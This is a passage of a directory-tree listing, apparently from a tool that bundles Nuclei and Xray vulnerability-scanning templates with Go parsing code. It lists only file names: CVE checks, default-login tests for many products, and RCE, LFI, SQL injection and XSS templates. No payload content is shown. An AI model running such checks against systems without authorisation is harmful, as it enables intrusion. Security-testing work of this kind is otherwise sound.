CVE-2022-28365.yaml │ │ │ ├── CVE-2022-29303.yaml │ │ │ ├── CVE-2022-29383.yaml │ │ │ ├── CVE-2022-29455.yaml │ │ │ ├── CVE-2022-29464.yaml │ │ │ ├── CVE-2022-29548.yaml │ │ │ ├── CVE-2022-30489.yaml │ │ │ ├── CVE-2022-30525.yaml │ │ │ ├── CVE-2022-30776.yaml │ │ │ └── CVE-2022-31268.yaml │ ├── default-logins │ │ ├── UCMDB │ │ │ └── ucmdb-default-login.yaml │ │ ├── abb │ │ │ └── cs141-default-login.yaml │ │ ├── activemq │ │ │ └── activemq-default-login.yaml │ │ ├── aem │ │ │ └── aem-default-login.yaml │ │ ├── alibaba │ │ │ └── canal-default-login.yaml │ │ ├── alphaweb │ │ │ └── alphaweb-default-login.yaml │ │ ├── ambari │ │ │ └── ambari-default-login.yaml │ │ ├── apache │ │ │ ├── airflow-default-login.yaml │ │ │ ├── apisix-default-login.yaml │ │ │ ├── dolphinscheduler-default-login.yaml │ │ │ ├── dubbo-admin-default-login.yaml │ │ │ ├── kafka-center-default-login.yaml │ │ │ ├── ranger-default-login.yaml │ │ │ └── tomcat-default-login.yaml │ │ ├── apollo │ │ │ └── apollo-default-login.yaml │ │ ├── arl │ │ │ └── arl-default-login.yaml │ │ ├── azkaban │ │ │ └── azkaban-default-login.yaml │ │ ├── chinaunicom │ │ │ └── chinaunicom-default-login.yaml │ │ ├── cobbler │ │ │ ├── cobbler-default-login.yaml │ │ │ └── hue-default-credential.yaml │ │ ├── dell │ │ │ ├── dell-idrac-default-login.yaml │ │ │ ├── dell-idrac9-default-login.yaml │ │ │ └── emcecom-default-login.yaml │ │ ├── digitalrebar │ │ │ └── digitalrebar-default-login.yaml │ │ ├── druid │ │ │ └── druid-default-login.yaml │ │ ├── dvwa │ │ │ └── dvwa-default-login.yaml │ │ ├── emqx │ │ │ └── emqx-default-login.yaml │ │ ├── exacqvision │ │ │ └── exacqvision-default-login.yaml │ │ ├── flir │ │ │ └── flir-default-login.yaml │ │ ├── frps │ │ │ └── frp-default-login.yaml │ │ ├── fuelcms │ │ │ └── fuelcms-default-login.yaml │ │ ├── geoserver │ │ │ └── geoserver-default-login.yaml │ │ ├── gitlab │ │ │ └── gitlab-weak-login.yaml │ │ ├── glpi │ │ │ └── glpi-default-login.yaml │ │ ├── google │ │ │ └── google-earth-dlogin.yaml │ │ ├── gophish │ │ │ └── gophish-default-login.yaml │ │ ├── grafana │ │ │ └── grafana-default-login.yaml │ │ ├── guacamole │ │ │ └── guacamole-default-login.yaml │ │ ├── hongdian │ │ │ └── hongdian-default-login.yaml │ │ ├── hortonworks │ │ │ └── smartsense-default-login.yaml │ │ ├── hp │ │ │ └── hp-switch-default-login.yaml │ │ ├── huawei │ │ │ └── huawei-HG532e-default-router-login.yaml │ │ ├── ibm │ │ │ ├── ibm-mqseries-default-login.yaml │ │ │ └── ibm-storage-default-credential.yaml │ │ ├── idemia │ │ │ └── idemia-biometrics-default-login.yaml │ │ ├── iptime │ │ │ └── iptime-default-login.yaml │ │ ├── jboss │ │ │ └── jmx-default-login.yaml │ │ ├── jenkins │ │ │ └── jenkins-default.yaml │ │ ├── jinher-oa-default-login.yaml │ │ ├── jupyterhub │ │ │ └── jupyterhub-default-login.yaml │ │ ├── mantisbt │ │ │ └── mantisbt-default-credential.yaml │ │ ├── minio │ │ │ └── minio-default-login.yaml │ │ ├── mofi │ │ │ └── mofi4500-default-login.yaml │ │ ├── nagios │ │ │ └── nagios-default-login.yaml │ │ ├── netsus │ │ │ └── netsus-default-login.yaml │ │ ├── nexus │ │ │ └── nexus-default-login.yaml │ │ ├── nps │ │ │ └── nps-default-login.yaml │ │ ├── octobercms-default-login.yaml │ │ ├── ofbiz │ │ │ └── ofbiz-default-login.yaml │ │ ├── openemr │ │ │ └── openemr-default-login.yaml │ │ ├── openwrt │ │ │ └── openwrt-default-login.yaml │ │ ├── oracle │ │ │ └── businessintelligence-default-login.yaml │ │ ├── others │ │ │ ├── inspur-clusterengine-default-login.yaml │ │ │ ├── kingsoft-v8-default-login.yaml │ │ │ ├── panabit-ixcache-default-login.yaml │ │ │ ├── secnet-ac-default-login.yaml │ │ │ └── telecom-gateway-default-login.yaml │ │ ├── paloalto │ │ │ └── panos-default-login.yaml │ │ ├── panabit │ │ │ └── panabit-default-login.yaml │ │ ├── pentaho │ │ │ └── pentaho-default-login.yaml │ │ ├── rabbitmq │ │ │ └── rabbitmq-default-login.yaml │ │ ├── rainloop │ │ │ └── rainloop-default-login.yaml │ │ ├── rancher │ │ │ └── rancher-default-login.yaml │ │ ├── ricoh │ │ │ └── ricoh-weak-password.yaml │ │ ├── rockmongo │ │ │ └── rockmongo-default-login.yaml │ │ ├── rseenet │ │ │ └── rseenet-default-login.yaml │ │ ├── samsung │ │ │ └── samsung-wlan-default-login.yaml │ │ ├── seeddms │ │ │ └── seeddms-default-login.yaml │ │ ├── sequoiadb │ │ │ └── sequoiadb-default-login.yaml │ │ ├── showdoc │ │ │ └── showdoc-default-login.yaml │ │ ├── solarwinds │ │ │ └── solarwinds-default-login.yaml │ │ ├── spectracom │ │ │ └── spectracom-default-login.yaml │ │ ├── stackstorm │ │ │ └── stackstorm-default-login.yaml │ │ ├── supermicro │ │ │ └── supermicro-default-login.yaml │ │ ├── szhe │ │ │ └── szhe-default-login.yaml │ │ ├── versa │ │ │ └── versa-default-login.yaml │ │ ├── vidyo │ │ │ └── vidyo-default-login.yaml │ │ ├── viewpoint │ │ │ └── trilithic-viewpoint-login.yaml │ │ ├── visionhub │ │ │ └── visionhub-default-login.yaml │ │ ├── weblogic │ │ │ └── weblogic-weak-login.yaml │ │ ├── wifisky │ │ │ └── wifisky-default-login.yaml │ │ ├── wso2 │ │ │ └── wso2-default-login.yaml │ │ ├── xerox │ │ │ └── xerox7-default-login.yaml │ │ ├── xxljob │ │ │ └── xxljob-default-login.yaml │ │ ├── zabbix │ │ │ └── zabbix-default-login.yaml │ │ └── zmanda │ │ │ └── zmanda-default-login.yaml │ └── vulnerabilities │ │ ├── apache │ │ ├── apache-flink-unauth-rce.yaml │ │ ├── apache-ofbiz-log4j-rce.yaml │ │ ├── apache-solr-file-read.yaml │ │ └── apache-solr-log4j-rce.yaml │ │ ├── cisco │ │ └── cucm-username-enumeration.yaml │ │ ├── code42 │ │ └── code42-log4j-rce.yaml │ │ ├── confluence │ │ └── confluence-ssrf-sharelinks.yaml │ │ ├── dedecms │ │ ├── dedecms-carbuyaction-fileinclude.yaml │ │ ├── dedecms-config-xss.yaml │ │ ├── dedecms-membergroup-sqli.yaml │ │ └── dedecms-openredirect.yaml │ │ ├── eyou │ │ └── eyou-email-rce.yaml │ │ ├── fastjson │ │ ├── fastjson-1-2-24-rce.yaml │ │ ├── fastjson-1-2-41-rce.yaml │ │ ├── fastjson-1-2-42-rce.yaml │ │ ├── fastjson-1-2-43-rce.yaml │ │ ├── fastjson-1-2-47-rce.yaml │ │ ├── fastjson-1-2-62-rce.yaml │ │ ├── fastjson-1-2-67-rce.yaml │ │ └── fastjson-1-2-68-rce.yaml │ │ ├── generic │ │ ├── basic-xss-prober.yaml │ │ ├── cache-poisoning.yaml │ │ ├── cors-misconfig.yaml │ │ ├── crlf-injection.yaml │ │ ├── error-based-sql-injection.yaml │ │ ├── generic-blind-xxe.yaml │ │ ├── generic-linux-lfi.yaml │ │ ├── generic-windows-lfi.yaml │ │ ├── host-header-injection.yaml │ │ ├── oob-header-based-interaction.yaml │ │ ├── oob-param-based-interaction.yaml │ │ ├── open-redirect.yaml │ │ ├── request-based-interaction.yaml │ │ ├── top-xss-params.yaml │ │ └── xmlrpc-pingback-ssrf.yaml │ │ ├── gitlab │ │ └── gitlab-rce.yaml │ │ ├── grafana │ │ └── grafana-file-read.yaml │ │ ├── httpbin │ │ ├── httpbin-open-redirect.yaml │ │ └── httpbin-xss.yaml │ │ ├── huawei │ │ └── huawei-hg255s-lfi.yaml │ │ ├── ibm │ │ ├── eclipse-help-system-xss.yaml │ │ └── ibm-infoprint-lfi.yaml │ │ ├── jamf │ │ ├── jamf-blind-xxe.yaml │ │ └── jamf-log4j-jndi-rce.yaml │ │ ├── jenkins │ │ ├── jenkins-asyncpeople.yaml │ │ ├── jenkins-script.yaml │ │ ├── jenkins-stack-trace.yaml │ │ └── unaunthenticated-jenkin.yaml │ │ ├── jira │ │ ├── jira-service-desk-signup.yaml │ │ ├── jira-unauthenticated-adminprojects.yaml │ │ ├── jira-unauthenticated-dashboards.yaml │ │ ├── jira-unauthenticated-installed-gadgets.yaml │ │ ├── jira-unauthenticated-projectcategories.yaml │ │ ├── jira-unauthenticated-projects.yaml │ │ ├── jira-unauthenticated-resolutions.yaml │ │ ├── jira-unauthenticated-screens.yaml │ │ └── jira-unauthenticated-user-picker.yaml │ │ ├── jolokia │ │ └── jolokia-heap-info-disclosure.yaml │ │ ├── joomla │ │ ├── joomla-jvehicles-lfi.yaml │ │ └── rusty-joomla.yaml │ │ ├── laravel │ │ └── laravel-ignition-xss.yaml │ │ ├── linkerd │ │ └── linkerd-ssrf.yaml │ │ ├── magento │ │ ├── magento-2-exposed-api.yaml │ │ ├── magento-cacheleak.yaml │ │ └── magento-unprotected-dev-files.yaml │ │ ├── metersphere │ │ └── metersphere-plugin-rce.yaml │ │ ├── mobileiron │ │ └── mobileiron-log4j-jndi-rce.yaml │ │ ├── moodle │ │ ├── moodle-filter-jmol-lfi.yaml │ │ ├── moodle-filter-jmol-xss.yaml │ │ └── moodle-xss.yaml │ │ ├── netsweeper │ │ ├── netsweeper-open-redirect.yaml │ │ └── netsweeper-rxss.yaml │ │ ├── oracle │ │ ├── oracle-ebs-bispgraph-file-access.yaml │ │ ├── oracle-ebs-xss.yaml │ │ └── oracle-siebel-xss.yaml │ │ ├── oscommerce │ │ └── oscommerce-rce.yaml │ │ ├── other │ │ ├── 3cx-management-console.yaml │ │ ├── 74cms-sqli.yaml │ │ ├── WSO2-2019-0598.yaml │ │ ├── accent-microcomputers-lfi.yaml │ │ ├── acme-xss.yaml │ │ ├── antsword-backdoor.yaml │ │ ├── asanhamayesh-lfi.yaml │ │ ├── aspnuke-openredirect.yaml │ │ ├── avada-xss.yaml │ │ ├── bems-api-lfi.yaml │ │ ├── beward-ipcamera-disclosure.yaml │ │ ├── bitrix-open-redirect.yaml │ │ ├── blue-ocean-excellence-lfi.yaml │ │ ├── bullwark-momentum-lfi.yaml │ │ ├── cacti-weathermap-file-write.yaml │ │ ├── caucho-resin-info-disclosure.yaml │ │ ├── chamilo-lms-sqli.yaml │ │ ├── chamilo-lms-xss.yaml │ │ ├── ckan-dom-based-xss.yaml │ │ ├── clockwatch-enterprise-rce.yaml │ │ ├── coldfusion-debug-xss.yaml │ │ ├── commax-biometric-auth-bypass.yaml │ │ ├── commax-credentials-disclosure.yaml │ │ ├── comtrend-password-exposure.yaml │ │ ├── concrete-xss.yaml │ │ ├── core-chuangtian-cloud-rce.yaml │ │ ├── couchdb-adminparty.yaml │ │ ├── cs-cart-unauthenticated-lfi.yaml │ │ ├── dicoogle-pacs-lfi.yaml │ │ ├── digitalrebar-traversal.yaml │ │ ├── discourse-xss.yaml │ │ ├── dixell-xweb500-filewrite.yaml │ │ ├── dlink-850L-info-leak.yaml │ │ ├── dotnetcms-sqli.yaml │ │ ├── dss-download-fileread.yaml │ │ ├── duomicms-sql-injection.yaml │ │ ├── ecshop-sqli.yaml │ │ ├── ecsimagingpacs-rce.yaml │ │ ├── eibiz-lfi.yaml │ │ ├── empirecms-xss.yaml │ │ ├── etouch-v2-sqli.yaml │ │ ├── ewebs-arbitrary-file-reading.yaml │ │ ├── eyelock-nano-lfd.yaml │ │ ├── fanruanoa2012-disclosure.yaml │ │ ├── fatpipe-auth-bypass.yaml │ │ ├── fatpipe-backdoor.yaml │ │ ├── feifeicms-lfr.yaml │ │ ├── finereport-path-traversal.yaml │ │ ├── flir-path-traversal.yaml │ │ ├── geovision-geowebserver-lfi.yaml │ │ ├── geovision-geowebserver-xss.yaml │ │ ├── global-domains-lfi.yaml │ │ ├── global-domains-xss.yaml │ │ ├── gloo-unauth.yaml │ │ ├── gnuboard-sms-xss.yaml │ │ ├── goip-1-lfi.yaml │ │ ├── groupoffice-lfi.yaml │ │ ├── gsoap-lfi.yaml │ │ ├── h3c-imc-rce.yaml │ │ ├── hanming-lfr.yaml │ │ ├── hashicorp-consul-rce.yaml │ │ ├── hasura-graphql-psql-exec.yaml │ │ ├── hasura-graphql-ssrf.yaml │ │ ├── hiboss-rce.yaml │ │ ├── hjtcloud-arbitrary-file-read.yaml │ │ ├── hjtcloud-rest-arbitrary-file-read.yaml │ │ ├── homeautomation-v3-openredirect.yaml │ │ ├── hrsale-unauthenticated-lfi.yaml │ │ ├── huawei-hg659-lfi.yaml │ │ ├── huawei-router-auth-bypass.yaml │ │ ├── huijietong-cloud-fileread.yaml │ │ ├── icewarp-webclient-rce.yaml │ │ ├── interlib-fileread.yaml │ │ ├── java-melody-xss.yaml │ │ ├── jeewms-lfi.yaml │ │ ├── jfrog-unauth-build-exposed.yaml │ │ ├── jinfornet-jreport-lfi.yaml │ │ ├── joomla-com-fabrik-lfi.yaml │ │ ├── kafdrop-xss.yaml │ │ ├── karel-ip-phone-lfi.yaml │ │ ├── kevinlab-bems-backdoor.yaml │ │ ├── kevinlab-bems-sqli.yaml │ │ ├── kevinlab-hems-backdoor.yaml │ │ ├── keycloak-xss.yaml │ │ ├── kingdee-eas-directory-traversal.yaml │ │ ├── kingsoft-v8-file-read.yaml │ │ ├── kyocera-m2035dn-lfi.yaml │ │ ├── laravel-filemanager-lfi.yaml │ │ ├── lotuscms-rce.yaml │ │ ├── lucee-xss.yaml │ │ ├── luftguitar-arbitrary-file-upload.yaml │ │ ├── maccmsv10-backdoor.yaml │ │ ├── magicflow-lfi.yaml │ │ ├── mcafee-epo-rce.yaml │ │ ├── metinfo-lfi.yaml │ │ ├── microstrategy-ssrf.yaml │ │ ├── microweber-xss.yaml │ │ ├── mida-eframework-xss.yaml │ │ ├── minimouse-lfi.yaml │ │ ├── mirai-unknown-rce.yaml │ │ ├── mpsec-lfi.yaml │ │ ├── ms-exchange-server-reflected-xss.yaml │ │ ├── myucms-lfr.yaml │ │ ├── natshell-path-traversal.yaml │ │ ├── natshell-rce.yaml │ │ ├── netgear-router-auth-bypass.yaml │ │ ├── netgear-router-exposure.yaml │ │ ├── netgear-wac124-router-auth-bypass.yaml │ │ ├── netis-info-leak.yaml │ │ ├── nginx-merge-slashes-path-traversal.yaml │ │ ├── nginx-module-vts-xss.yaml │ │ ├── ns-asg-file-read.yaml │ │ ├── nuuo-file-inclusion.yaml │ │ ├── nuuo-nvrmini2-rce.yaml │ │ ├── odoo-cms-redirect.yaml │ │ ├── oliver-library-lfi.yaml │ │ ├── opensis-lfi.yaml │ │ ├── opensns-rce.yaml │ │ ├── openvpn-hhi.yaml │ │ ├── optilink-ont1gew-gpon-rce.yaml │ │ ├── oracle-fatwire-lfi.yaml │ │ ├── orbiteam-bscw-server-lfi.yaml │ │ ├── otobo-open-redirect.yaml │ │ ├── pacsone-server-lfi.yaml │ │ ├── parentlink-xss.yaml │ │ ├── pbootcms-database-file-download.yaml │ │ ├── pdf-signer-ssti-to-rce.yaml │ │ ├── php-timeclock-xss.yaml │ │ ├── php-zerodium-backdoor-rce.yaml │ │ ├── phpok-sqli.yaml │ │ ├── phpwiki-lfi.yaml │ │ ├── pmb-directory-traversal.yaml │ │ ├── pmb-local-file-disclosure.yaml │ │ ├── pollbot-redirect.yaml │ │ ├── powercreator-cms-rce.yaml │ │ ├── processmaker-lfi.yaml │ │ ├── pyspider-unauthorized-access.yaml │ │ ├── qcubed-xss.yaml │ │ ├── qi-anxin-netkang-next-generation-firewall-rce.yaml │ │ ├── qihang-media-disclosure.yaml │ │ ├── qihang-media-lfi.yaml │ │ ├── qizhi-fortressaircraft-unauth.yaml │ │ ├── rconfig-rce.yaml │ │ ├── resin-cnnvd-200705-315.yaml │ │ ├── resin-inputfile-fileread.yaml │ │ ├── resin-viewfile-lfr.yaml │ │ ├── rockmongo-xss.yaml │ │ ├── sangfor-ba-rce.yaml │ │ ├── sap-redirect.yaml │ │ ├── sar2html-rce.yaml │ │ ├── seacms-rce.yaml │ │ ├── seacms-sqli.yaml │ │ ├── seowon-router-rce.yaml │ │ ├── servicenow-helpdesk-credential.yaml │ │ ├── showdoc-file-upload-rce.yaml │ │ ├── sick-beard-xss.yaml │ │ ├── sl-studio-lfi.yaml │ │ ├── sofneta-mecdream-pacs-lfi.yaml │ │ ├── solar-log-authbypass.yaml │ │ ├── sonicwall-sslvpn-shellshock.yaml │ │ ├── spark-webui-unauth.yaml │ │ ├── sponip-network-system-ping-rce.yaml │ │ ├── symantec-messaging-gateway.yaml │ │ ├── tamronos-rce.yaml │ │ ├── tekon-info-leak.yaml │ │ ├── thinkific-redirect.yaml │ │ ├── thruk-xss.yaml │ │ ├── tianqing-info-leak.yaml │ │ ├── tikiwiki-json-rpc.yaml │ │ ├── tikiwiki-reflected-xss.yaml │ │ ├── tpshop-directory-traversal.yaml │ │ ├── turbocrm-xss.yaml │ │ ├── twig-php-ssti.yaml │ │ ├── ueditor-file-upload.yaml │ │ ├── unauth-hoteldruid-panel.yaml │ │ ├── unauth-rlm.yaml │ │ ├── unauth-spark-api.yaml │ │ ├── unifi-network-log4j-rce.yaml │ │ ├── vanguard-post-xss.yaml │ │ ├── viewlinc-crlf-injection.yaml │ │ ├── vpms-auth-bypass.yaml │ │ ├── watchguard-credentials-disclosure.yaml │ │ ├── webui-rce.yaml │ │ ├── wems-manager-xss.yaml │ │ ├── wooyun-path-traversal.yaml │ │ ├── wuzhicms-sqli.yaml │ │ ├── xdcms-sqli.yaml │ │ ├── xerox-efi-lfi.yaml │ │ ├── yapi-rce.yaml │ │ ├── yarn-resourcemanager-rce.yaml │ │ ├── yishaadmin-lfi.yaml │ │ ├── yonyou-u8-oa-sqli.yaml │ │ ├── zcms-v3-sqli.yaml │ │ ├── zimbra-preauth-ssrf.yaml │ │ └── zms-auth-bypass.yaml │ │ ├── rails │ │ └── rails6-xss.yaml │ │ ├── ransomware │ │ └── deadbolt-ransomware.yaml │ │ ├── rocketchat │ │ └── unauth-message-read.yaml │ │ ├── ruijie │ │ ├── ruijie-eg-rce.yaml │ │ ├── ruijie-networks-lfi.yaml │ │ ├── ruijie-networks-rce.yaml │ │ └── ruijie-password-leak.yaml │ │ ├── samsung │ │ ├── samsung-wlan-ap-lfi.yaml │ │ ├── samsung-wlan-ap-rce.yaml │ │ └── samsung-wlan-ap-xss.yaml │ │ ├── sangfor │ │ ├── sangfor-edr-auth-bypass.yaml │ │ └── sangfor-edr-rce.yaml │ │ ├── seeyon │ │ ├── wooyun-2015-148227.yaml │ │ ├── zhiyuan-file-upload.yaml │ │ ├── zhiyuan-oa-info-leak.yaml │ │ └── zhiyuan-oa-session-leak.yaml │ │ ├── simplecrm │ │ └── simple-crm-sql-injection.yaml │ │ ├── springboot │ │ ├── springboot-actuators-jolokia-xxe.yaml │ │ ├── springboot-h2-db-rce.yaml │ │ └── springboot-log4j-rce.yaml │ │ ├── squirrelmail │ │ ├── squirrelmail-add-xss.yaml │ │ ├── squirrelmail-lfi.yaml │ │ └── squirrelmail-vkeyboard-xss.yaml │ │ ├── thinkcmf │ │ ├── thinkcmf-arbitrary-code-execution.yaml │ │ ├── thinkcmf-lfi.yaml │ │ └── thinkcmf-rce.yaml │ │ ├── thinkphp │ │ ├── thinkphp-2-rce.yaml │ │ ├── thinkphp-501-rce.yaml │ │ ├── thinkphp-5022-rce.yaml │ │ ├── thinkphp-5023-rce.yaml │ │ └── thinkphp-509-information-disclosure.yaml │ │ ├── tongda │ │ ├── tongda-path-traversal.yaml │ │ └── tongda-session-disclosure.yaml │ │ ├── vmware │ │ ├── vmware-horizon-log4j-jndi-rce.yaml │ │ ├── vmware-vcenter-lfi-linux.yaml │ │ ├── vmware-vcenter-lfi.yaml │ │ ├── vmware-vcenter-log4j-jndi-rce.yaml │ │ ├── vmware-vcenter-ssrf.yaml │ │ └── vrealize-operations-log4j-rce.yaml │ │ ├── weaver │ │ ├── ecology │ │ │ ├── ecology-arbitrary-file-upload.yaml │ │ │ ├── ecology-filedownload-directory-traversal.yaml │ │ │ ├── ecology-springframework-directory-traversal.yaml │ │ │ ├── ecology-syncuserinfo-sqli.yaml │ │ │ └── ecology-v8-sqli.yaml │ │ └── oa-v9-uploads-file.yaml │ │ ├── wordpress │ │ ├── accessibility-helper-xss.yaml │ │ ├── ad-widget-lfi.yaml │ │ ├── admin-word-count-column-lfi.yaml │ │ ├── advanced-access-manager-lfi.yaml │ │ ├── age-gate-open-redirect.yaml │ │ ├── ait-csv-import-export-rce.yaml │ │ ├── alfacgiapi-wordpress.yaml │ │ ├── amministrazione-aperta-lfi.yaml │ │ ├── aspose-file-download.yaml │ │ ├── aspose-ie-file-download.yaml │ │ ├── aspose-pdf-file-download.yaml │ │ ├── aspose-words-file-download.yaml │ │ ├── attitude-theme-open-redirect.yaml │ │ ├── brandfolder-lfi.yaml │ │ ├── brandfolder-open-redirect.yaml │ │ ├── cab-fare-calculator-lfi.yaml │ │ ├── candidate-application-lfi.yaml │ │ ├── cherry-file-download.yaml │ │ ├── cherry-lfi.yaml │ │ ├── church-admin-lfi.yaml │ │ ├── churchope-lfi.yaml │ │ ├── db-backup-lfi.yaml │ │ ├── diarise-theme-lfi.yaml │ │ ├── dzs-zoomsounds-listing.yaml │ │ ├── easy-media-gallery-pro-listing.yaml │ │ ├── eatery-restaurant-open-redirect.yaml │ │ ├── elex-woocommerce-xss.yaml │ │ ├── feedwordpress-xss.yaml │ │ ├── flow-flow-social-stream-xss.yaml │ │ ├── hb-audio-lfi.yaml │ │ ├── health-check-lfi.yaml │ │ ├── hide-security-enhancer-lfi.yaml │ │ ├── issuu-panel-lfi.yaml │ │ ├── mthemeunus-lfi.yaml │ │ ├── music-store-open-redirect.yaml │ │ ├── my-chatbot-xss.yaml │ │ ├── nativechurch-wp-theme-lfd.yaml │ │ ├── newsletter-manager-open-redirect.yaml │ │ ├── newsletter-open-redirect.yaml │ │ ├── ninjaform-open-redirect.yaml │ │ ├── pieregister-open-redirect.yaml │ │ ├── sassy-social-share.yaml │ │ ├── seo-redirection-xss.yaml │ │ ├── shortcode-lfi.yaml │ │ ├── simple-image-manipulator-lfi.yaml │ │ ├── sniplets-lfi.yaml │ │ ├── sniplets-xss.yaml │ │ ├── ultimatemember-open-redirect.yaml │ │ ├── video-synchro-pdf-lfi.yaml │ │ ├── w3c-total-cache-ssrf.yaml │ │ ├── weekender-newspaper-open-redirect.yaml │ │ ├── wordpress-accessible-wpconfig.yaml │ │ ├── wordpress-affiliatewp-log.yaml │ │ ├── wordpress-bbpress-plugin-listing.yaml │ │ ├── wordpress-db-backup-listing.yaml │ │ ├── wordpress-db-backup.yaml │ │ ├── wordpress-db-repair.yaml │ │ ├── wordpress-debug-log.yaml │ │ ├── wordpress-directory-listing.yaml │ │ ├── wordpress-elementor-plugin-listing.yaml │ │ ├── wordpress-emergency-script.yaml │ │ ├── wordpress-git-config.yaml │ │ ├── wordpress-gtranslate-plugin-listing.yaml │ │ ├── wordpress-infinitewp-auth-bypass.yaml │ │ ├── wordpress-installer-log.yaml │ │ ├── wordpress-rce-simplefilelist.yaml │ │ ├── wordpress-rdf-user-enum.yaml │ │ ├── wordpress-redirection-plugin-listing.yaml │ │ ├── wordpress-social-metrics-tracker.yaml │ │ ├── wordpress-ssrf-oembed.yaml │ │ ├── wordpress-tmm-db-migrate.yaml │ │ ├── wordpress-total-upkeep-backup-download.yaml │ │ ├── wordpress-updraftplus-pem-key.yaml │ │ ├── wordpress-user-enum.yaml │ │ ├── wordpress-woocommerce-listing.yaml │ │ ├── wordpress-woocommerce-sqli.yaml │ │ ├── wordpress-wordfence-lfi.yaml │ │ ├── wordpress-wordfence-waf-bypass-xss.yaml │ │ ├── wordpress-wordfence-xss.yaml │ │ ├── wordpress-wp-cron.yaml │ │ ├── wordpress-xmlrpc-listmethods.yaml │ │ ├── wordpress-zebra-form-xss.yaml │ │ ├── wp-123contactform-plugin-listing.yaml │ │ ├── wp-adaptive-xss.yaml │ │ ├── wp-altair-listing.yaml │ │ ├── wp-ambience-xss.yaml │ │ ├── wp-arforms-listing.yaml │ │ ├── wp-church-admin-xss.yaml │ │ ├── wp-code-snippets-xss.yaml │ │ ├── wp-config-setup.yaml │ │ ├── wp-custom-tables-xss.yaml │ │ ├── wp-email-subscribers-listing.yaml │ │ ├── wp-enabled-registration.yaml │ │ ├── wp-finder-xss.yaml │ │ ├── wp-flagem-xss.yaml │ │ ├── wp-full-path-disclosure.yaml │ │ ├── wp-grimag-open-redirect.yaml │ │ ├── wp-gtranslate-open-redirect.yaml │ │ ├── wp-haberadam-idor.yaml │ │ ├── wp-idx-broker-platinum-listing.yaml │ │ ├── wp-install.yaml │ │ ├── wp-iwp-client-listing.yaml │ │ ├── wp-javospot-lfi.yaml │ │ ├── wp-knews-xss.yaml │ │ ├── wp-license-file.yaml │ │ ├── wp-mailchimp-log-exposure.yaml │ │ ├── wp-memphis-documents-library-lfi.yaml │ │ ├── wp-mstore-plugin-listing.yaml │ │ ├── wp-multiple-theme-ssrf.yaml │ │ ├── wp-nextgen-xss.yaml │ │ ├── wp-oxygen-theme-lfi.yaml │ │ ├── wp-phpfreechat-xss.yaml │ │ ├── wp-plugin-1-flashgallery-listing.yaml │ │ ├── wp-plugin-lifterlms.yaml │ │ ├── wp-plugin-utlimate-member.yaml │ │ ├── wp-popup-listing.yaml │ │ ├── wp-prostore-open-redirect.yaml │ │ ├── wp-qards-listing.yaml │ │ ├── wp-revslider-file-download.yaml │ │ ├── wp-securimage-xss.yaml │ │ ├── wp-security-open-redirect.yaml │ │ ├── wp-sfwd-lms-listing.yaml │ │ ├── wp-simple-fields-lfi.yaml │ │ ├── wp-slideshow-xss.yaml │ │ ├── wp-socialfit-xss.yaml │ │ ├── wp-spot-premium-lfi.yaml │ │ ├── wp-super-forms.yaml │ │ ├── wp-tinymce-lfi.yaml │ │ ├── wp-tutor-lfi.yaml │ │ ├── wp-under-construction-ssrf.yaml │ │ ├── wp-upload-data.yaml │ │ ├── wp-vault-lfi.yaml │ │ ├── wp-whmcs-xss.yaml │ │ ├── wp-woocommerce-email-verification.yaml │ │ ├── wp-woocommerce-file-download.yaml │ │ ├── wp-woocommerce-pdf-invoice-listing.yaml │ │ ├── wp-xmlrpc-brute-force.yaml │ │ ├── wp-xmlrpc-pingback-detection.yaml │ │ ├── wp-xmlrpc.yaml │ │ ├── wpdm-cache-session.yaml │ │ ├── wpmudev-pub-keys.yaml │ │ └── wptouch-open-redirect.yaml │ │ └── yonyou │ │ └── erp-nc-directory-traversal.yaml ├── pkg │ ├── common │ │ └── structs │ │ │ └── commonStructs.go │ ├── nuclei │ │ ├── catalog │ │ │ ├── catalogue.go │ │ │ └── find.go │ │ ├── parse │ │ │ ├── parse.go │ │ │ └── parser.go │ │ ├── structs │ │ │ └── faketype.go │ │ └── templates │ │ │ ├── cluster.go │ │ │ ├── compile.go │ │ │ ├── preprocessors.go │ │ │ ├── templates.go │ │ │ └── workflows.go │ └── xray │ │ ├── cel │ │ ├── cel.go │ │ ├── definition.go │ │ └── implementation.go │ │ ├── requests │ │ ├── cache.go │ │ └── requests.go │ │ └── structs │ │ ├── cache.go │ │ ├── poc.go │ │ ├── requests.pb.go │ │ ├── requests.proto │ │ └── tasks.go ├── utils │ ├── load.go │ └── utils.go ├── xrayFiles │ ├── 74cms-sqli-1.yml │ ├── 74cms-sqli-2.yml │ ├── 74cms-sqli.yml │ ├── activemq-cve-2016-3088.yml │ ├── activemq-default-password.yml │ ├── airflow-unauth.yml │ ├── alibaba-canal-default-password.yml │ ├── alibaba-canal-info-leak.yml │ ├── alibaba-nacos-v1-auth-bypass.yml │ ├── amtt-hiboss-server-ping-rce.yml │ ├── apache-ambari-default-password.yml │ ├── apache-druid-cve-2021-36749.yml │ ├── apache-flink-upload-rce.yml │ ├── apache-httpd-cve-2021-40438-ssrf.yml │ ├── apache-httpd-cve-2021-41773-path-traversal.yml │ ├── apache-httpd-cve-2021-41773-rce.yml │ ├── apache-kylin-unauth-cve-2020-13937.yml │ ├── apache-nifi-api-unauthorized-access.yml │ ├── apache-ofbiz-cve-2018-8033-xxe.yml │ ├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml │ ├── apache-storm-unauthorized-access.yml │ ├── aspcms-backend-leak.yml │ ├── bash-cve-2014-6271.yml │ ├── bt742-pma-unauthorized-access.yml │ ├── cacti-weathermap-file-write.yml │ ├── chinaunicom-modem-default-password.yml │ ├── cisco-cve-2020-3452-readfile.yml │ ├── citrix-cve-2019-19781-path-traversal.yml │ ├── citrix-cve-2020-8191-xss.yml │ ├── citrix-cve-2020-8193-unauthorized.yml │ ├── citrix-xenmobile-cve-2020-8209.yml │ ├── coldfusion-cve-2010-2861-lfi.yml │ ├── confluence-cve-2015-8399.yml │ ├── confluence-cve-2019-3396-lfi.yml │ ├── confluence-cve-2021-26084.yml │ ├── confluence-cve-2021-26085-arbitrary-file-read.yml │ ├── consul-rexec-rce.yml │ ├── consul-service-rce.yml │ ├── coremail-cnvd-2019-16798.yml │ ├── couchcms-cve-2018-7662.yml │ ├── couchdb-cve-2017-12635.yml │ ├── couchdb-unauth.yml │ ├── craftcms-seomatic-cve-2020-9757-rce.yml │ ├── dahua-cve-2021-33044-authentication-bypass.yml │ ├── datang-ac-default-password-cnvd-2021-04128.yml │ ├── dedecms-carbuyaction-fileinclude.yml │ ├── dedecms-cve-2018-6910.yml │ ├── dedecms-cve-2018-7700-rce.yml │ 